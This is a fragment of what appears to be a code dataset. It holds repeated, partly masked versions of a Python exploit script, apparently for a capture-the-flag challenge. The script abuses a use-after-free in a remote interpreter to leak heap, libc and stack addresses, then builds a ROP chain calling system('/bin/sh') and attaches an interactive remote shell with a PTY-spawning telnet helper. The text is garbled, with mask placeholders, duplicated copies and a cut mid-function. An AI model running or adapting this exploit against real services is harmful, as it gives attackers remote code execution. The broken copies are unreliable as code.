0\n BINARY = 1\n X = 4\n Y = 16\n Z = 2\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i + 1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n if end - start >= Y + 2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n parts = mergedparts\n buf = ''\n last = None\n for tag, value in parts:\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n buf += d(value)\n last = tag\n buf += ansi(Term.CLEAR)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException('Server disconnected.')\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024)\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info('Server disconnected.')\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\n\n<mask token>\n\n\ndef p32(d):\n \"\"\"Return d packed as 32-bit unsigned integer (little endian).\"\"\"\n return pack('<I', d)\n\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\n\n<mask token>\n\n\ndef print_bad(msg):\n print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_info(msg):\n print('[*] ' + msg)\n\n\n<mask token>\n\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert all(b not in data for b in badchars)\n\n\ndef is_printable(b):\n \"\"\"Return true if the given byte is a printable ASCII character.\"\"\"\n return b in e(string.printable)\n\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return (b in\n b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n )\n lines = []\n chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for\n b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,\n right, asciiblock))\n return '\\n'.join(lines)\n\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n UNDERLINE = '4'\n BOLD = '1'\n ESCAPE_START = '\\x1b['\n ESCAPE_END = 'm'\n\n\n<mask token>\n\n\nclass DisconnectException(Exception):\n pass\n\n\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception('Pattern length is way to large')\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return ''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n idx = self._seq.index(needle)\n if self._seq[idx + len(needle):].find(needle) != -1:\n raise ValueError('Multiple occurances found!')\n return idx\n\n\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n X = 4\n Y = 16\n Z = 2\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i + 1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n if end - start >= Y + 2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n parts = mergedparts\n buf = ''\n last = None\n for tag, value in parts:\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n buf += d(value)\n last = tag\n buf += ansi(Term.CLEAR)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException('Server disconnected.')\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024)\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info('Server disconnected.')\n return\n\n\n<mask token>\n\n\ndef send(b):\n c.send(b)\n\n\ndef sendline(l):\n c.sendline(l)\n\n\ndef sendnum(n):\n c.sendnum(n)\n\n\n<mask token>\n\n\ndef recvtil(delim):\n return c.recvtil(delim)\n\n\n<mask token>\n\n\ndef interact():\n c.interact()\n\n\n<mask token>\n\n\ndef readvar(name):\n evl('=')\n recvtil('Bad token: 0-1\\n> ')\n evl(name)\n response = recvtil('> ')\n return response.split(b'\\n')[0]\n\n\ndef readintvar(name):\n return int(d(readvar(name)))\n\n\n<mask token>\n\n\ndef gc(remaining):\n \"\"\"Trigger gargabe collection\"\"\"\n for i in range(remaining):\n evl('{}'.format(i))\n\n\ndef leak(addr, length):\n \"\"\"Leaks process memory by abusing the UAF to temporarily inject a fake string.\"\"\"\n fake_str_addr = heap_base + 176\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(15):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n gc(16)\n return readstrvar('a')[0:length]\n\n\n<mask token>\n\n\ndef pwn():\n global heap_base\n recvtil('>')\n evl('x=\"XXXXXXXXXXXXXXXX\"')\n heap_base = heapleak()\n print_good('Heap base @ 0x{:x}'.format(heap_base))\n evl('\"{}\"'.format('A' * 256))\n gc(20 - 4)\n heap_mem = leak(heap_base, 4096)\n for i in range(0, len(heap_mem) - 16, 8):\n flink = u64(heap_mem[i:i + 8])\n blink = u64(heap_mem[i + 8:i + 16])\n if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and \n flink < 140737488355328 and blink > 139637976727552 and blink <\n 140737488355328):\n break\n else:\n print_bad('No freelist pointers found :(')\n return\n libc = flink - 3938600\n print_good('libc @ 0x{:x}'.format(libc))\n env_ptr = u64(leak2(libc + 3949728, 8))\n print_good('stack @ 0x{:x}'.format(env_ptr))\n system = libc + 288144\n bin_sh = libc + 1573123\n pop_rdi = libc + 142234\n pop_rsi = libc + 149637\n pop_rdx = libc + 7054\n add_rsp_0x48 = libc + 1006475\n print_good('/bin/sh @ 0x{:x}'.format(bin_sh))\n input_buf = env_ptr - 808\n print_good('input_buf @ 0x{:x}'.format(input_buf))\n ret_addr = env_ptr - 808 - 8\n print_good('return address @ 0x{:x}'.format(ret_addr))\n evl('l.a=x')\n evl('h.a=x')\n evl('a.a=x')\n evl('b.a=x')\n evl('c.a=x')\n evl('d.a=x')\n evl('e.a=x')\n evl('f.a=x')\n for i in range(9):\n evl('\"{}\"'.format('A' * 16))\n evl('1337')\n for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:\n for p in ALPHABET:\n evl('{}.{}=x'.format(o, p))\n for i in range(6):\n evl('1337')\n for i in 'ghijk':\n evl('{}=x'.format(i))\n fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265\n ) + b'D' * 240\n evl(b'n=\"' + fake_str + b'\"')\n payload = b'\\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(\n input_buf - 7)\n payload += b'\\x00' * (384 - len(payload))\n evl(b'o=\"' + payload + b'\"')\n fake_str_addr = heap_base + 7808\n evl('p=o+{}'.format(fake_str_addr))\n payload = b'A' * 256\n payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)\n payload += p64(8) + p64(ret_addr)\n evl(payload)\n binary = readstrvar('p')\n binary = u64(binary) - 2769\n print_good('binary @ 0x{:x}'.format(binary))\n offset_to_ret = ret_addr - (input_buf & 18446744073709551360)\n print_good('offset to return address: 0x{:x}'.format(offset_to_ret))\n if offset_to_ret > 40 or offset_to_ret < 0:\n print_bad('Bad offset')\n return\n prop_name = p64(binary + 2761)[1]\n if prop_name < ord('A') or prop_name > ord('z'):\n print_bad('Bad propery name: {}'.format(prop_name))\n return\n prop_name = chr(prop_name)\n print_good('property name: {}'.format(prop_name))\n payload = b'A' * 56\n payload += p64(pop_rdi)\n payload += p64(bin_sh)\n payload += p64(system)\n validate(payload, [b'\\n'])\n evl(payload)\n evl('{}=42'.format(prop_name))\n payload = b'A' * offset_to_ret\n payload += p64(add_rsp_0x48)\n validate(payload, [b'\\n'])\n evl(payload)\n time.sleep(0.5)\n interact()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\n\ndef d(d):\n \"\"\"Decode the given bytes instance using UTF-8.\"\"\"\n return d.decode('UTF-8')\n\n\ndef p32(d):\n \"\"\"Return d packed as 32-bit unsigned integer (little endian).\"\"\"\n return pack('<I', d)\n\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\n\ndef p64(d):\n \"\"\"Return d packed as 64-bit unsigned integer (little endian).\"\"\"\n return pack('<Q', d)\n\n\ndef u64(d):\n \"\"\"Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian).\"\"\"\n return unpack('<Q', d)[0]\n\n\ndef print_good(msg):\n print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_bad(msg):\n print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_info(msg):\n print('[*] ' + msg)\n\n\ndef bytes_and_strings_are_cool(func):\n \"\"\"Decorator to encode arguments that are string instances.\"\"\"\n\n def inner(*args, **kwargs):\n nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else\n arg, args))\n nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else\n (k, v), kwargs))\n return func(*nargs, **nkwargs)\n return inner\n\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert all(b not in data for b in badchars)\n\n\ndef is_printable(b):\n \"\"\"Return true if the given byte is a printable ASCII character.\"\"\"\n return b in e(string.printable)\n\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return (b in\n b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n )\n lines = []\n chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for\n b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,\n right, asciiblock))\n return '\\n'.join(lines)\n\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n UNDERLINE = '4'\n BOLD = '1'\n ESCAPE_START = '\\x1b['\n ESCAPE_END = 'm'\n\n\ndef ansi(*args):\n \"\"\"Construct an ANSI terminal escape code.\"\"\"\n code = Term.ESCAPE_START\n code += ';'.join(args)\n code += Term.ESCAPE_END\n return code\n\n\nclass DisconnectException(Exception):\n pass\n\n\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception('Pattern length is way to large')\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return ''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n idx = self._seq.index(needle)\n if self._seq[idx + len(needle):].find(needle) != -1:\n raise ValueError('Multiple occurances found!')\n return idx\n\n\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n X = 4\n Y = 16\n Z = 2\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i + 1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n if end - start >= Y + 2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n parts = mergedparts\n buf = ''\n last = None\n for tag, value in parts:\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n buf += d(value)\n last = tag\n buf += ansi(Term.CLEAR)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException('Server disconnected.')\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024)\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info('Server disconnected.')\n return\n\n\ndef telnet(shell='/bin/bash'):\n \"\"\"Telnet emulation.\n\n Opens a PTY on the remote end and connects the master side to the socket.\n Then spawns a shell connected to the slave end and puts the controlling TTY\n on the local machine into raw mode.\n Result: Something similar to a telnet/(plaintext)ssh session.\n\n Vim, htop, su, less, etc. will work with this.\n\n !!! This function only works if the channel is connected to a shell !!!\n \"\"\"\n assert sys.stdin.isatty()\n c.setVerbose(False)\n code = \"import pty; pty.spawn(['{}', '-i'])\".format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5)\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n tty.setraw(sys.stdin)\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n')\n recvtil('READY\\r\\n')\n interact()\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)\n\n\ndef send(b):\n c.send(b)\n\n\ndef sendline(l):\n c.sendline(l)\n\n\ndef sendnum(n):\n c.sendnum(n)\n\n\n<mask token>\n\n\ndef recvtil(delim):\n return c.recvtil(delim)\n\n\ndef recvn(n):\n return c.recvn(n)\n\n\ndef recvline():\n return c.recvline()\n\n\ndef recvregex(r):\n return c.recvregex(r)\n\n\ndef interact():\n c.interact()\n\n\n<mask token>\n\n\ndef evl(code):\n sendline(code)\n\n\ndef readvar(name):\n evl('=')\n recvtil('Bad token: 0-1\\n> ')\n evl(name)\n response = recvtil('> ')\n return response.split(b'\\n')[0]\n\n\ndef readintvar(name):\n return int(d(readvar(name)))\n\n\ndef readstrvar(name):\n return readvar(name)[1:-1]\n\n\ndef heapleak():\n \"\"\"Free the lhs and rhs values during add_assign. ...\"\"\"\n for i in range(16):\n evl('{}'.format(i))\n evl('h=0+0')\n return readintvar('h') & 18446744073709547520\n\n\ndef gc(remaining):\n \"\"\"Trigger gargabe collection\"\"\"\n for i in range(remaining):\n evl('{}'.format(i))\n\n\ndef leak(addr, length):\n \"\"\"Leaks process memory by abusing the UAF to temporarily inject a fake string.\"\"\"\n fake_str_addr = heap_base + 176\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(15):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n gc(16)\n return readstrvar('a')[0:length]\n\n\ndef leak2(addr, length):\n \"\"\"Same as above, but different offsets...\"\"\"\n fake_str_addr = heap_base + 368\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(12):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n return readstrvar('a')[0:length]\n\n\ndef pwn():\n global heap_base\n recvtil('>')\n evl('x=\"XXXXXXXXXXXXXXXX\"')\n heap_base = heapleak()\n print_good('Heap base @ 0x{:x}'.format(heap_base))\n evl('\"{}\"'.format('A' * 256))\n gc(20 - 4)\n heap_mem = leak(heap_base, 4096)\n for i in range(0, len(heap_mem) - 16, 8):\n flink = u64(heap_mem[i:i + 8])\n blink = u64(heap_mem[i + 8:i + 16])\n if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and \n flink < 140737488355328 and blink > 139637976727552 and blink <\n 140737488355328):\n break\n else:\n print_bad('No freelist pointers found :(')\n return\n libc = flink - 3938600\n print_good('libc @ 0x{:x}'.format(libc))\n env_ptr = u64(leak2(libc + 3949728, 8))\n print_good('stack @ 0x{:x}'.format(env_ptr))\n system = libc + 288144\n bin_sh = libc + 1573123\n pop_rdi = libc + 142234\n pop_rsi = libc + 149637\n pop_rdx = libc + 7054\n add_rsp_0x48 = libc + 1006475\n print_good('/bin/sh @ 0x{:x}'.format(bin_sh))\n input_buf = env_ptr - 808\n print_good('input_buf @ 0x{:x}'.format(input_buf))\n ret_addr = env_ptr - 808 - 8\n print_good('return address @ 0x{:x}'.format(ret_addr))\n evl('l.a=x')\n evl('h.a=x')\n evl('a.a=x')\n evl('b.a=x')\n evl('c.a=x')\n evl('d.a=x')\n evl('e.a=x')\n evl('f.a=x')\n for i in range(9):\n evl('\"{}\"'.format('A' * 16))\n evl('1337')\n for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:\n for p in ALPHABET:\n evl('{}.{}=x'.format(o, p))\n for i in range(6):\n evl('1337')\n for i in 'ghijk':\n evl('{}=x'.format(i))\n fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265\n ) + b'D' * 240\n 